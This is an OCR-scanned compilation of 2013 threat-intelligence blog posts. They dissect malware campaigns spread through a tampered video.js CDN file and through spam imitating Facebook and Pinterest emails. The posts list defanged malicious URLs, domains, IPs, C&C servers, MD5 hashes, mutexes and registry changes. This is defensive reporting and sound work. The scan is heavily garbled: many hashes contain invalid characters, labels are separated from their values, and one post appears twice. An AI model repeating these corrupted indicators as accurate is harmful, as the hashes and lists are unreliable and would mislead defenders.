hxxp://vjs.zencdn.net/c/video.js -> hxxp://cdn.adsbarscipt.com/links/jump/ (198.7.59.235; 
63.247.93.69; 69.39.238.28; 74.81.94.44) (IE) -> hxxp://cdn.adsbarscipt.com/links/flash/?- 


updnew (CHROME) -> hxxp://209.239.127.185/591918d6c2e8ce3f53ed8b93fb0735cd/face- 
book.php 


Detection rate for a sample malicious script found on the client-side exploits serving 
site: 


[6]JMD5: 809f70b26e3a50fb9146ddfa8cf500be - detected by 1 out of 49 antivirus scan- 
ners as Trojan.Script.Heuristic-js.iacgm 


Sample detection rate for the served client-side exploit: 


[7JMD5: 71c92ebc2a889d3541ff6F20b4740868 - detected by 4 out of 49 antivirus scan- 
ners as HEUR:Exploit.Java.CVE-2012-1723.gen; HEUR _JAVA.EXEC 


Detection rate for a sample dropped malware: 


[8]MD5: 4bfb3379a2814f5eb67345d43bce3091 - detected by 15 out of 49 antivirus scanners 
as Trojan-PSW.Win32.Fareit.acqv; PWS:Win32/Fareit.gen!C 


The following malicious MD5s are known to have been downloaded from the same IPs 
(cdn.adsbarscipt.com (198.7.59.235; 63.247.93.69; 69.39.238.28; 74.81.94.44): 


[9JMD5: 82e1013106736b74255586169a217d66 
[10]MD5: 01771c3500a5b1543f4fb43945337c7d 


[11]MD5: dbf6f5373f56f67e843af30fded5c7f2 


Additionally, the campaign is also known to have’ dropped = [12]MD5: 
01771¢c3500a5b1543f4fb43945337c7d 


Once executed, the most recently dropped sample (MD5: 4bfb3379a2814f5eb67345d43bce3091) 
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phones back to the following C &C servers: 


main-firewalls.com (67.228.177.174; 74.204.171.69; 85.195.104.90) - Email: 
alex1978a@bigmir.net 


simple-cdn-node.com (109.120.143.109) - Email: alex1978a@bigmir.net 


akamai.com/gate.php 


Deja vu! We’ve already seen alex1978a@bigmir.net in [13]Network Solution’s (2010) 
mass Wordpress blogs compromise, a campaign which is also directly connected with [14]the 
compromise of the Web site of the U.S Treasury. 


The sample also attempts to download the following additional malware variants: 


main-firewalls.com/6.exe 
main-firewalls.com/1.exe 


simple-cdn-node.com/1.exe - [15]MD5: 05d003a374a29c9c2bbc250dd5c56d7c 


Responding to 67.228.177.174 are also the following malicious domains: 


aodairangdong.com 
bolsaminimall.com 
catch-cdn.com 
corp-firewall.com 
himarkrealty.com 
ngnetworld.com 
ritz-entertainment.com 
server.evietmusic.com 
viettv24.com 
vpoptv.com 
plussolarsolutions.com 
artistflower.com 
autoairsystems.com 
eighteas.com 
greenpowersurvey.com 
phattubi.com 
ritz-entertainment.com 
saigoncitymall.com 


The following malicious MD5s are also known to have phoned back to the same IP 
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(67.228.177.174) in the past: 


MD5 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


05636d38090e5726077cea54d2485806 


53b73675flb08cf7ecfc3c80677c8d2e 


Of424ff9db97dafaba746f26d6d8d5c0 


633d6de861ledc2ecf667f02d0997f10e 


d13ead2b8a424b5e9c5977f8715514c4 


bfc9803c94cc8ba76a916f8eE915042e4 


a04d33ced90f72c1a77f312708681c07 


7e6e15518cc48639612aa4ff00a2a454 


98d78ef8cc5aee193a7b7a3c3bb58c87 


a030d6e35d736db9dd433a8d2ac8a915 


1f7a6ed70be6el3efb45e5ba80eed76e 


cfc727a0ad51eb1f111305873d2ade04 


1b6de030ed3b42e939690630f63d6933 


fa9e92d42580e1789ed04e551a379e4e 


2ed9d63e4d557667bad7806872cf4412 


bef16d25b2cada2a388ea06c204b44f3 


77a93ba48d6532e069745bcal17d26ed 


7c7e4cef8a7181f7982a841f7F752368 


57b65e6f38998e32fa93856970cc66c5e 


5d388b1f2bf2dc9493f5c4cfb9d53ca0 


ec24a959e39c5d2eb7dc769f4b098efb 


6357085196499ef5301548ff17b62619 


3173d4be34f489a4630f2439f9653c2c 


3bd239ee46ab8ba02f57ed1762bd3ae6 
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MD5: dce3e33eb294f0a7688be5beab6b7e9d4 
MD5: 1ed678e9d29c25043fdd1b4c44f5b2ea 
MD5: eccce6f5f509f4ef986d426445a98f0d 

MD5: 74e1e2f2d562ab6883124cfa43300cf2 


MD5: 6922efa2e5aal16b78c982d633cbe44e9 


Responding to 85.195.104.90 are also the following malicious domains: 
catch-cdn.com 

corp-firewall.com 

kronoemail.com 

main-firewalls.com 


viacominfosys.com 
emaildatastore.com 


The following malicious MD5s are also known to have phoned back to the same IP 
(85.195.104.90) in the past: 


MD5: 88110dbce9591b68b06b859e7965d509 
MD5: 0e055888564fb59cb6d4e35a5c5fb33d 
MD5: e9d8d2842b576fd4f6ef9ddelfea4b9f 
MD5: €750031fc9b9264852133d8f7284ac7a 
MD5: eO0da2ca4e9al174cd3c6f8a348e4861ad 
MD5: b23a579d7b8bf5a03c121d2f74234b2d 
MD5: alee5246d984d900f27ce94fbfc37c2b 
MD5: 2118a70a2ccf0a7772725e765ad64e08 
MD5: f26848e64040b4b6614d95bd967045df 
MD5: 9c5997b32bea6945f0cb9ff0c18cf040 
MD5: 353305483087a5316fd75f63d641ecl1f 


MD5: 34e67771ca411b163866fle795b2e72e 
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MD5: 571e04b5af915979efc5a7f77794fach 
MD5: a21df3ee0c9dd87cf6ca66581aa7eb76 
MD5: e2137edd5f550b1942c16e70095c436b 


MD5: 97437f6d670db2596b6a6b53c887055c 


Such type of factual attribution based on gathered historical OSINT, isn’t surprising, thanks to 
the fact that despite the increasing number of novice cybercriminals joining the ecosystem, the 
"usual suspects" continue operating for the sake of achieving their fraudulent and malicious 
objectives. 


Updates will be posted as soon as new developments take place. 


1. http: //ddanchev. blogspot .com/2010/04/dissecting-wordpress-blogs- compromise. htm 


2. http://ddanchev.blogspot .com/2010/05/us-treasury-site-compromise-linked-to.htm 


3. 
4. http://blog.videojs.com/post//unauthorized-modification-of-video-js-cdn-files 

5. http: //waw.fireeye .com/blog/technical/cyber-exploits/2013/09/darkleech-says-hello. html 

6. 
7. 
8. 


_ https: //aww. virustotal . com/en/file/e40a7604c087a7 09ec9b9t8a78564d1542c4d221733eb4ebb5 12b345202a8e1d/analys 
12. https://www. virustotal. com/en/file/eaSbe0th4367e038c602a3de561 1821d2367f3326ab2a12f 469db4cda06tafa7/anal 
. http: //ddanchev. blogspot . com/2010/04/dissect:ing-wordpress-blogs- compromise. html 
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15. https://www.virustotal.com/en/file/e28f368359094d42110fbae6bbef5cca649eac4ba540192827cac7b794bdaab7/ana 
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9.9.4 Spamvertised Facebook ’You have friend suggestions, friend requests and 
photo tags’ Themed Emails Lead to Client-side Exploits and Malware 
(2013-09-28 13:53) 


», You have new notifications. 


A lot has happened on Facebook since you last logged in. Here are some notifications you've missed from your 
friends. 


ea [Tnessages 


‘jend requests 
& riend suggestions 
fry photo tags 


Wrov a rie:l:nicm | Go to Facebook 


unsubscribe 


A currently circulating malicious ’Facebook notifications" themed spam campaign, attempts to 
trick Facebook’s users into thinking that they’ve received a notifications digest for the activity 
that (presumably) took place while they were logged out of Facebook. In reality though, once 
users click on any of the links found in the malicious email, they’re automatically exposed to 
client-side exploits ultimately dropping malware on their hosts. 


Let’s dissect the campaign, provide actionable intelligence on the campaign’s structure, 
the involved portfolio of malicious domains, actual/related MD5s, and as always, connect the 
currently ongoing campaign with two other previously profiled malicious campaigns. 


Spamvertised URL: 
hxxp://user4634.vs.easily.co.uk/darkened/PSEUDO _RANDOM CHARACTERS 


Attempts to load the following malicious scripts: 
hxxp://3dbrandscapes.com/starker/manipulator.js 
hxxp://distrigold.eu/compounding/melisa.js 
hxxp://ly-ra.com/shallot/mandalay.js 


Client-side exploits serving URL: 
hxxp://directgrid.org/topic/lairtg-nilles-slliks.php 


Malicious domain name reconnaissance: 
directgrid.org - 50.116.10.71 - Email: ringfields@islandresearch.net 
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Responding to the following IP (50.116.10.71) are also the following malicious domains 
participating in the campaign: 
directgrid.biz 

directgrid.com 

directgrid.info 

directgrid.net 

directgrid.org 

directgrid.us 

gilkjones.com 
integra-inspection.ca 
integra-inspection.co 
integra-inspection.info 
taxipunjab.com 
taxisamritsar.com 
watttrack.com 


The following malicious MD5s are known to have been downloaded - related campaigns 
- from the same IP (50.116.10.71): 

MD5: 7eb6740ed6935da49614d95a43146dea 

MD5: 7768f7039988236165cdd5879934cc5d 


The following malicious MD5s are known to have ’phoned back’ to the same IP (50.116.10.71) 
over the past 24 hours: 

MD5: a0065f7649db9a885acd34301ae863b0 
MD5: 5503573f4fe15b211956f67c66e18d02 
MD5: 01d757b672673df8032abbaa8acf3e22 
MD5: 7ad68895e5ec9d4f53fc9958c70dfOla 
MD5: fd99250ecb845a455499db8df1780807 
MD5: fd99250ecb845a455499db8df1780807 
MD5: 3983170d46a130f23471340a47888c93 
MD5: c86c79d9fee925a690a4b0307d7f2329 
MD5: 25f498f7823f12294c685e9bc79376d2 
MD5: 470f4aa3f76ea3b465741a73ce6c22fe 
MD5: 43b78852a7363d8a4cf7538d4e68c887 
MD5: e3aae430ed4036b19f26fa2ed9bbe2bf 
MD5: e782619301a0a0a843cedc5d02c563b5 
MD5: fc16335d0e1827b271b031309634dcO0f 
MD5: a55e21b0231d0508cb638892b6ee8ec5 
MD5: 053c84c12900b81506eb884ec9f930c9 
MD5: e03d0dd786b038c570dc53690db0673b 
MD5: 086b16af34857cb5dfb0163cc1c92569 
MD5: e066b50bae491587574603bdfd60826e 
MD5: eb22137880f8c5a03c73135f288afb8a 
MD5: b88392fb63747668c982b6321e5ce712 
MD5: 6254d901b1566bef94e6 7 3f833adff8c 
MD5: 258d640b802a0bbe08471f4f064cb94a 
MD5: clcefo742107516c3a73489eael176745 
MD5: a19f1d5c98c2d7f036f2693ad6c14626 
MD5: 3f02f35bc73ad9ef14ab4f960926fd45 
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Sample detection rate for the client-side exploits serving malicious script: 
[1]MD5: 00f5d150ff1b50cObbc1d038eb676c29 - detected by 2 out of 48 antivirus scanners as 
Script.Exploit.Kit.C; Troj/Obf]S-EO 


Sample detection rate for the served exploit: 
[2]MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners 
as HEUR:Exploit.Java.Generic; HEUR _JAVA.EXEC; TROJ _GEN.F47V0927 


Upon successful client-side exploitation the campaign drops the following malicious 
sample on the affected hosts: 

[3]MD5: 6ef9476e6227ef631b231b66d7a2a08b - detected by 7 out of 48 antivirus scanners 
as Win32/Spy.Zbot.AAU; Trojan-Spy.Win32.Zbot.qckm; TROJ _GEN.F47V0927 


Once executed, the sample starts listening on ports 3185 and 7101. 


It also creates the following Mutexes on the system: 
Local\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 
Local\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
Local\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Local\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Local\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Local\ {911F9FCD-AFAC-6AF2-DBC9-BE58FA349D4A } 
Global\ {2E06BA86-8AE 7-D5EB-DBC9-BE58FA349D4A } 
Global\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 
Global\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
Global\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Global\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Global\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Global\ {BB67AFC4-9FA5-408A-DBC9-BE58FA349D4A } 
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Global\ {3DC7903B-A05A-C62A-11EB-B06D3016937F } 
Global\ {3DC7903B-A05A-C62A-75EA-B06D5417937F } 
Global\ {3DC7903B-A05A-C62A-4DE9-B06D6C14937F } 
Global\ {3DC7903B-A05A-C62A-65E9-B06D4414937F } 
Global\ {3DC7903B-A05A-C62A-89E9-B06DA814937F } 
Global\ {3DC7903B-A05A-C62A-BDE9-B06D9C14937F } 
Global\ {3DC7903B-A05A-C62A-51E8-B06D7015937F } 
Global\ {3DC7903B-A05A-C62A-81E8-BO6DA015937F } 
Global\ {3DC7903B-A05A-C62A-FDE8-BO6DDC15937F } 
Global\ {3DC7903B-A05A-C62A-0ODEF-BO6D2C12937F } 
Global\ {3DC7903B-A05A-C62A-5DEF-BO6D7C12937F } 
Global\ {3DC7903B-A05A-C62A-95EE-B06DB413937F } 
Global\ {3DC7903B-A05A-C62A-F1EE-BO6DD013937F } 
Global\ {3DC7903B-A05A-C62A-89EB-BO6DA816937F } 
Global\ {3DC7903B-A05A-C62A-F9EF-BO6DD812937F } 
Global\ {3DC7903B-A05A-C62A-E5EF-B06DC412937F } 
Global\ {3DC7903B-A05A-C62A-ODEE-B06D2C13937F } 
Global\ {3DC7903B-A05A-C62A-09ED-B06D2810937F } 
Global\ {3DC7903B-A05A-C62A-51EF-BO6D7012937F } 
Global\ {3DC7903B-A05A-C62A-35EC-B06D1411937F } 
Global\ {3DC7903B-A05A-C62A-55EF-B06D7412937F } 
Global\ {DDB39BDC-ABBD-265E-DBC9-BE58FA349D4A } 
Global\ {2E1C200D-106C-D5F1-DBC9-BE58FA349D4A } 
MPSWabDataAccessMutex 
MPSWABOlIkStoreNotifyMutex 


The following Registry Keys: 
HKEY _CURRENT _USER\Software\Microsoft\Waosumag 


And changes the following Registry Values: 

[HKEY _CURRENT _USER\Identities] -> Identity Login = 0x00098053 

[HKEY _CURRENT _USER\Software\Microsoft\Windows textbackslashCurrentVersion\Run] -> 
Keby = "" %AppData %\Ortuet\keby.exe"" 

[HKEY CURRENT _USER\Software\Microsoft\Waosumag ] -> 2df3e6ig = 23 CD 87 C3 1E D1 FA 
C6 28 2E DF 4D 12 21; 2icbbj3a = OxC3E6CD13; 185cafc2 = CB D5 E6 C3 F6 D8 CD C6 05 2E 
EF 4D 


It then phones back to the following C &C (command and control) servers: 
99.157.164.179 
174.76.94.24 
99.60.68.114 
217.35.75.232 
184.145.205.63 
99.60.111.51 
207.47.212.146 
108.240.232.212 
107.193.222.108 
173.202.183.58 
201.170.83.92 
81.136.188.57 
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71.186.174.184 


We've already seen the same IPs (217.35.75.232; 108.240.232.212) in the following pre- 
viously profiled malicious campaign - [4]Spamvertised “FDIC: Your business account” themed 
emails serve client-side exploits and malware. 


We've also seen (107.193.222.108) in the following malicious campaign - [5]Spamver- 
tised ‘Export License/Invoice Copy’ themed emails lead to malware, indicating that all of 
these campaigns are controlled using the same malicious botnet infrastructure. 


The following malicious MD5s are also known to have phoned back to the same C &C 
servers used in this campaign, over the past 24 hours: 
MD5: 9f550edbb505e22b0203e766bd1b9982 
MD5: 46cdaead83d9e3de803125e45ca88894 
MD5: ffe07e0997d8ec82feb81bac53838d6d 
MD5: 28c0bc772aec891a08b06a4029230626 
MD5: c8055c6668d1c4c9cb9d68c2c09c14d4 
MD5: Obbabb722e1327cbe903ab477716ae2e 
MD5: c4c5db70e7c971e3e556eb9d65f87c84 
MD5: Off4d450ce9bleaaef5ed9a5alfa392d 
MD5: e01f435a8c5ed93f6800971505a2cdd2 
MD5: 042508083351b79f01a4d7b7e8e35826 
MD5: 1f5f75ae82d6aa7099315bf19d0ae4e0 
MD5: 35c4d4c2031157645bb3ale4e709edeb 
MD5: a0065f7649db9a885acd34301ae863b0 
MD5: 5503573f4fe15b211956f67c66e18d02 
MD5: 01d757b672673df8032abbaa8acf3e22 
MD5: fd99250ecb845a455499db8df1780807 
MD5: 1fab971283479b017dfb79857ecd343b 
MD5: a130cddd61dad9188b9b89451a58af28 
MD5: 2af94e79f9b9ee26032ca863a86843be 
MD5: 8b03a5cf4f149ac7696d108bff586cc5 
MD5: 802a522405076d7f8b944b781e4fe133 
MD5: b9c7d2466a689365ebb8f6f607cd3368 
MD5: 43b78852a7363d8a4cf7538d4e68c887 
MD5: c62b6206e9eefe75bal804788dc552f7 
MD5: 385b5358f6a1f15706b536a9dc5b1590 
MD5: e3aae430ed4036b19f26fa2ed9bbe2bf 
MD5: e782619301a0a0a843cedc5d02c563b5 
MD5: fc16335d0e1827b271b031309634dcOf 
MD5: 4850969b7febc82c8b82296fal29e818 
MD5: 203e0acced8a76560312b452d70ffle7 
MD5: a55e21b0231d0508cb638892b6ee8ec5 
MD5: edbla26ebb8ab5df780b643ad1f0d50f 
MD5: 053c84c12900b81506eb884ec9f930c9 
MD5: e03d0dd786b038c570dc53690db0673b 
MD5: 47d4804fda31b6f88b0d33b86fc681ae 
MD5: 086b16af34857cb5dfb0163cc1c92569 


This post has been reproduced from [6]Dancho Danchev’s blog . Follow him 
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[7]Jon Twitter. 
1. https://www.virustotal .com/en/file/95d3cfd6c1f094871f311593c73726700a1fcc7alf5cf13ced1317c040545873/analys 


is/1380362621/ 


2. https://www.virustotal .com/en/file/bd7c0f52fd7d7e9b20ab9e8F 13ac114243a4f09433f484f 8fbc3b51c7c44650d/analys 
3. https://www.virustotal .com/en/file/8b0e0b269a2e332bae756304c07£392789f 1c0215c2b23d52cc13fbiae49f076/analys 
is/1380320726/ 


4. http://www.webroot.com/blog/2013/09/23/spamvertised-fdic-business-account-themed-emails-server-client-sid 


e-exploits-malware/ 


5. http://www.webroot.com/blog/2013/07/09/spamvertised-export-licenseinvoice-copy-themed-emails-lead-to-mal 
6. http://ddanchev.blogspot.com/ 
7 


ttp://twitter .com/danchodanche 


Ee 
~ 


9.9.5 Spamvertised Facebook ’You have friend suggestions, friend requests and 
photo tags’ Themed Emails Lead to Client-side Exploits and Malware 
(2013-09-28 13:53) 


», You have new notifications. 


A lot has happened on Facebook since you last logged in. Here are some notifications you've missed from your 
friends. 


CI [Tnessages 


‘jend requests 
& riend suggestions 
(fs) photo tags 


cot Facebook 


unsubscribe 


A currently circulating malicious ’Facebook notifications" themed spam campaign, attempts to 
trick Facebook’s users into thinking that they’ve received a notifications digest for the activity 
that (presumably) took place while they were logged out of Facebook. In reality though, once 
users click on any of the links found in the malicious email, they’re automatically exposed to 
client-side exploits ultimately dropping malware on their hosts. 
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Let’s dissect the campaign, provide actionable intelligence on the campaign’s structure, 
the involved portfolio of malicious domains, actual/related MD5s, and as always, connect the 
currently ongoing campaign with two other previously profiled malicious campaigns. 


Spamvertised URL: 


hxxp://user4634.vs.easily.co.uk/darkened/PSEUDO RANDOM CHARACTERS 


Attempts to load the following malicious scripts: 
hxxp://3dbrandscapes.com/starker/manipulator.js 
hxxp://distrigold.eu/compounding/melisa.js 


hxxp://ly-ra.com/shallot/mandalay.js 


Client-side exploits serving URL: 


hxxp://directgrid.org/topic/lairtg-nilles-slliks.php 


Malicious domain name reconnaissance: 


directgrid.org - 50.116.10.71 - Email: ringfields@islandresearch.net 


Responding to the following IP (50.116.10.71) are also the following malicious domains 
participating in the campaign: 


directgrid.biz 
directgrid.com 
directgrid.info 
directgrid.net 


directgrid.org 
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directgrid.us 


gilkjones.com 


integra-inspection.ca 


integra-inspection.co 


integra-inspection.info 


taxipunjab.com 


taxisamritsar.com 


watttrack.com 


The following malicious MD5s are known to have been downloaded - related campaigns 
- from the same IP (50.116.10.71): 


MD5: 7eb6740ed6935da49614d95a43146dea 


MD5: 


7768f7039988236165cdd5879934cc5d 


The following malicious MD5s are known to have ’phoned back’ to the same IP (50.116.10.71) 
over the past 24 hours: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


a0065f7649db9a885acd34301ae863b0 


5503573f4fe15b211956f67c66e18d02 


01d757b672673df8032abbaa8acf3e22 


7ad68895e5ec9d4f53fc9958c70df0la 


fd99250ecb845a455499db8df1780807 


fd99250ecb845a455499db8df1780807 


3983170d46a130f23471340a47888c93 


c86c79d9fee925a690a4b0307d7f2329 


25f498f7823f12294c685e9bc79376d2 


470f4aa3f76ea3b465741a73ce6c22fe 
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MD5: 43b78852a7363d8a4cf7538d4e68c887 
MD5: e3aae430ed4036b19f26fa2ed9bbe2bf 
MD5: e782619301a0a0a843cedc5d02c563b5 
MD5: fc16335d0e1827b271b031309634dcOf 
MD5: a55e21b0231d0508cb638892b6ee8ec5 
MD5: 053c84c12900b81506eb884ec9f930c9 
MD5: e03d0dd786b038c570dc53690db0673b 
MD5: 086b16af34857cb5dfb0163cc1c92569 
MD5: e066b50bae491587574603bdfd60826e 
MD5: eb22137880f8c5a03c73135f288afb8a 
MD5: b88392fb63747668c982b6321e5ce712 
MD5: 6254d901b1566bef94e67 3f833adff8c 
MD5: 258d640b802a0bbe08471f4f064cb94a 
MD5: clcefo742107516c3a73489eae176745 
MD5: a19f1d5c98c2d7f036f2693ad6c14626 


MD5: 3f02f35bc73ad9ef14ab4f960926fd45 


Sample detection rate for the client-side exploits serving malicious script: 


[1]MD5: O0f5d150ff1b50cObbc1d038eb676c29 - detected by 2 out of 48 antivirus scan- 
ners as Script.Exploit.Kit.C; Troj/ObfJS-EO 
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Sample detection rate for the served exploit: 


[2]MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners 
as HEUR:Exploit.Java.Generic; HEUR _JAVA.EXEC; TROJ _GEN.F47V0927 


Upon successful client-side exploitation the campaign drops the following malicious 
sample on the affected hosts: 


[3]MD5: 6ef9476e6227ef631b231b66d7a2a08b - detected by 7 out of 48 antivirus scan- 
ners as Win32/Spy.Zbot.AAU; Trojan-Spy.Win32.Zbot.qckm; TROJ _GEN.F47V0927 


Once executed, the sample starts listening on ports 3185 and 7101. 


It also creates the following Mutexes on the system: 


Local\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 
Local\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
Local\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Local\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Local\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Local\ {911F9FCD-AFAC-6AF2-DBC9-BE58FA349D4A } 
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Global\ {2EO6BA86-8AE7-D5EB-DBC9-BE58FA349D4A } 
Global\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 
Global\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
Global\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Global\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Global\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Global\ {BB67AFC4-9FA5-408A-DBC9-BE58FA349D4A } 
Global\ {3DC7903B-A05A-C62A-11EB-B06D3016937F } 
Global\ {3DC7903B-A05A-C62A-75EA-B06D5417937F } 
Global\ {3DC7903B-A05A-C62A-4DE9-B06D6C14937F } 
Global\ {3DC7903B-A05A-C62A-65E9-B06D4414937F } 
Global\ {3DC7903B-A05A-C62A-89E9-B06DA814937F } 
Global\ {3DC7903B-A05A-C62A-BDE9-B06D9C14937F } 
Global\ {3DC7903B-A05A-C62A-51E8-B06D7015937F } 
Global\ {3DC7903B-A05A-C62A-81E8-BO6DA015937F } 
Global\ {3DC7903B-A05A-C62A-FDE8-BO6DDC15937F } 
Global\ {3DC7903B-A05A-C62A-ODEF-BO6D2C12937F } 
Global\ {3DC7903B-A05A-C62A-5DEF-BO6D7C12937F } 
Global\ {3DC7903B-A05A-C62A-95EE-B06DB413937F } 
Global\ {3DC7903B-A05A-C62A-F1EE-BO6DD013937F } 
Global\ {3DC7903B-A05A-C62A-89EB-BO6DA816937F } 
Global\ {3DC7903B-A05A-C62A-F9EF-BO6DD812937F } 
Global\ {3DC7903B-A05A-C62A-E5EF-BO6DC412937F } 
Global\ {3DC7903B-A05A-C62A-ODEE-B06D2C13937F } 
Global\ {3DC7903B-A05A-C62A-09ED-B06D2810937F } 
Global\ {3DC7903B-A05A-C62A-51EF-BO6D7012937F } 
Global\ {3DC7903B-A05A-C62A-35EC-B06D1411937F } 
Global\ {3DC7903B-A05A-C62A-55EF-B06D7412937F } 
Global\ {DDB39BDC-ABBD-265E-DBC9-BE58FA349D4A } 
Global\ {2E1C200D-106C-D5F1-DBC9-BE58FA349D4A } 
MPSWabDataAccessMutex 
MPSWABOlIkStoreNotifyMutex 


The following Registry Keys: 


HKEY _CURRENT _USER\Software\Microsoft\Waosumag 


And changes the following Registry Values: 


[HKEY _CURRENT _USER\Identities] -> Identity Login = 0x00098053 

[HKEY _CURRENT _USER\Software\Microsoft\Windows textbackslashCurrentVersion\Run] -> 
Keby = "" %AppData %\Ortuet\keby.exe"" 

[HKEY _CURRENT _USER\Software\Microsoft\Waosumag ] -> 2df3e6ig = 23 CD 87 C3 1E D1 FA 
C6 28 2E DF 4D 12 21; 2icbbj3a = OxC3E6CD13; 185cafc2 = CB D5 E6 C3 Fé D8 CD C6 05 2E 
EF 4D 
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It then phones back to the following C &C (command and control) servers: 


99.157.164.179 
174.76.94.24 
99.60.68.114 
217.35.75.232 
184.145.205.63 
99.60.111.51 
207.47.212.146 
108.240.232.212 
107.193.222.108 
173.202.183.58 
201.170.83.92 
81.136.188.57 
71.186.174.184 


We've already seen the same IPs (217.35.75.232; 108.240.232.212) in the following pre- 
viously profiled malicious campaign - [4]Spamvertised “FDIC: Your business account” themed 
emails serve client-side exploits and malware. 


We've also seen (107.193.222.108) in the following malicious campaign - [5]Spamver- 
tised ‘Export License/Invoice Copy’ themed emails lead to malware, indicating that all of 
these campaigns are controlled using the same malicious botnet infrastructure. 


The following malicious MD5s are also known to have phoned back to the same C &C 
servers used in this campaign, over the past 24 hours: 


MD5: 9f550edbb505e22b0203e766bd1b9982 
MD5: 46cdaead83d9e3de803125e45ca88894 
MD5: ffe07e0997d8ec82feb81bac53838d6d 

MD5: 28c0bc772aec891a08b06a4029230626 
MD5: c8055c6668d1c4c9cb9d68c2c09c14d4 
MD5: Obbabb722e1327cbe903ab477716ae2e 
MD5: c4c5db70e7c971e3e556eb9d65f87c84 


MD5: Off4d450ce9bleaaef5ed9a5alfa392d 
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MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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e01f435a8c5ed93f6800971505a2cdd2 


042508083351b79f01a4d7b7e8e35826 


1f5f75ae82d6aa7099315bf19d0ae4e0 


35c4d4c2031157645bb3ale4e709edeb 


a0065f7649db9a885acd34301ae863b0 


5503573f4fe15b211956f67c66e18d02 


01d757b672673df8032abbaa8acf3e22 


fd99250ecb845a455499db8df1780807 


1fab971283479b017dfb79857ecd343b 


al30cddd61dad9188b9b89451a58af28 


2af94e7 9f9b9ee26032ca863a86843be 


8b03a5cf4f149ac7696d108bff586cc5 


802a522405076d7f8b944b781e4fe133 


b9c7d2466a689365ebb8f6f607cd3368 


43b78852a7363d8a4cf7538d4e68c887 


c62b6206e9eefe75bal804788dc552f7 


385b5358f6a1f15706b536a9dc5b1590 


e3aae430ed4036b19f26fa2ed9bbe2bf 


e€782619301a0a0a843cedc5d02c563b5 


fc16335d0e1827b271b031309634dcO0f 


4850969b7febc82c8b82296fal29e818 


203e0acced8a76560312b452d70ffle7 


a55e21b0231d0508cb638892b6ee8ec5 


edbla26ebb8ab5df780b643ad1f0d50f 


053c84c12900b81506eb884ec9f930c9 


MD5: e03d0dd786b038c570dc53690db0673b 
MD5: 47d4804fda31b6f88b0d33b86fc681ae 


MD5: 086b16af34857cb5dfb0163cc1c92569 


Updates will be posted as soon as new developments take place. 


1. https://www.virustotal .com/en/file/95d3cfd6c1f094871f311593c73726700a1fcc7alf5cf13ced1317c040545873/analys 
is/1380362621/ 
2. https://www.virustotal .com/en/file/bd7c0f52fd7d7e9b20ab9e8F 13ac114243a4f09433f484f 8f bc3b51c7c44650d/analys 


3. https://www.virustotal .com/en/file/8b0e0b269a2e332bae756304c07£392789F 1c0215c2b23d52cc13fbiae49f076/analys 
is/1380320726/ 
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9.10 October 


9.10.1 Fake Pinterest ’Don’t forget to confirm your email!’ Themed Emails Serve 
Client-side Exploits and Malware (2013-10-01 21:12) 


Vinterest 
We just want to make sure we got your email right. Please let zs 
us nti ville “ Confirm Email 


Happy pinning! 


Cybercriminals have just launched yet another massive spam campaign, this time attempting 
to trick Pinterest users into thinking that they’ve received an email confirmation request. In 
reality though, once users click on the links found in the malicious emails, they’re automati- 
cally exposed to client-side exploits, with the campaign dropping two malware samples on the 
affected hosts once a successful client-side exploitation takes place. 


Let’s dissect the campaign, expose the malicious portfolio of domains involved in it, pro- 
vide MD5s of the served malware as well as a sample exploit, and provide actionable 
(historical) intelligence regarding related malicious activities that have been taking place 
using same infrastructure that’s involved in the Pinterest campaign. 


Spamvertised malicious URL: 
boxenteam.com/hathaway/index.html?emailmpss/PSEUDO _RANDOM _CHARACTERS 


Attempts to load the following malicious scripts: 
theodoxos.gr/hairstyles/defiling.js 
web29.webbox11.server-home.org/volleyballs/cloture.js 
knopflos-combo.de/subdued/opposition.js 


Sample client-side exploits serving URL: 
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pizzapluswindsor.ca/topic/latest-blog-news.php 


Malicious domain name reconnaissance: 
pizzapluswindsor.ca - 50.116.6.57; 174.140.169.145 


Responding to the same IP (50.116.6.57) are also the following malicious domains part 
of the campaing’s infrastructure: 

pizzapluswindsor.ca 

plainidea.com 

procreature.com 

poindextersonpatrol.com 

pixieglitztutus.com 


Known to have responded to the second IP (174.140.169.145) are also the following 
malicious domains: 
lesperancerenovations.com 
louievozza.com 

louvozza.com 

lv-contracting.com 
Ivconcordecontracting.com 
mcbelectrical.ca 

oliviagurun.com 

onecable.ca 

onlyidea.com 

